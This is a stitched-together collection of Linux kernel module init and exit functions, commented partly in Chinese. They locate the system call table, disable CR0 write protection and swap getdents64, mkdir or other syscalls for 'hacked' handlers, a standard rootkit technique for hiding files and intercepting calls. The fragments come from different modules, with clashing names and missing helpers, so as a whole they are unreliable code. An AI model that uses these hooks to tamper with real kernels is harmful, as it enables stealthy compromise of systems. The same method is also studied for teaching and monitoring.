static int __init monitor_init(void){ //int i; sys_call_table=getscTable(); if(sys_call_table==NULL) { printk(KERN_INFO "%s:can't find system_call table.\n",__FUNCTION__); return -1; } sys_call_table=(unsigned long *)((unsigned long)sys_call_table|0xffffffff00000000); printk("sys_call_table address is 0x%lx\n",(unsigned long)sys_call_table); printk("here 1,sys_getdents64__address is 0x%lx\n",sys_call_table[217]); //hook sys_getdents64 system call if(sys_call_table[__NR_getdents64]!=(unsigned long)hacked_getdents) { orig_cr0=clear_and_return_cr0(); orig_getdents=(void *)sys_call_table[__NR_getdents64]; if(hacked_getdents!=NULL) sys_call_table[__NR_getdents64]=(unsigned long)hacked_getdents; printk(KERN_ALERT "orig getdents:0x%lx,hacked getdents:0x%lx.\n",(unsigned long)orig_getdents,(unsigned long)hacked_getdents); setback_cr0(orig_cr0); return 0; } else return -1; }
static void lkm_exit(void) { unsigned int orig_cr0 = clear_and_return_cr0(); syscall_table[__NR_mkdir] = (unsigned long) origin_mkdir; setback_cr0(orig_cr0); printk(KERN_ALERT "lkm_exit\n"); }
void my_cleanup_module(void) /*模块卸载*/ { printk("exit ok\n"); orig_cr0 = clear_and_return_cr0(); //cr0寄存器的第16位清0 sys_call_table[SYSCALL_NUM] = orig_syscall; /*把系统调用恢复*/ //恢复cr0寄存器的第16位 setback_cr0(orig_cr0); }
static void __exit monitor_cleanup(void){ //restore /*if((sys_call_table[57]!=sys_fork_default_handler)&&sys_fork_default_handler) sys_call_table[57]=sys_fork_default_handler; */ if(sys_call_table&&(sys_call_table[__NR_getdents64]==(unsigned long)hacked_getdents)) { orig_cr0=clear_and_return_cr0(); sys_call_table[__NR_getdents64]=(unsigned long)orig_getdents; setback_cr0(orig_cr0); printk(KERN_INFO "Restore sys_getdents64.\n"); } printk("module exit.\n"); }
int my_init_module(void) /*模块初始化*/ { printk("init ok, SYSCALL NUM = %d\n", SYSCALL_NUM); printk("table at %p\n", sys_call_table); orig_cr0 = clear_and_return_cr0(); //cr0寄存器的第16位清0 orig_syscall = sys_call_table[SYSCALL_NUM]; sys_call_table[SYSCALL_NUM] = hacked_cmd; //恢复cr0寄存器的第16位 setback_cr0(orig_cr0); return 0; }
static int lkm_init(void) { unsigned int orig_cr0; printk(KERN_ALERT "lkm_init\n"); conivent_printf("lkm_init"); syscall_table = (unsigned int*) get_sys_call_table(); if(syscall_table == 0) { printk(KERN_ALERT "can't find syscall_table addr\n"); return -1; } origin_mkdir = syscall_table[__NR_mkdir]; //printk("addr of old_handler %x\n", old_handler); orig_cr0 = clear_and_return_cr0(); syscall_table[__NR_mkdir] = (unsigned long) modified_mkdir; setback_cr0(orig_cr0); return 0; }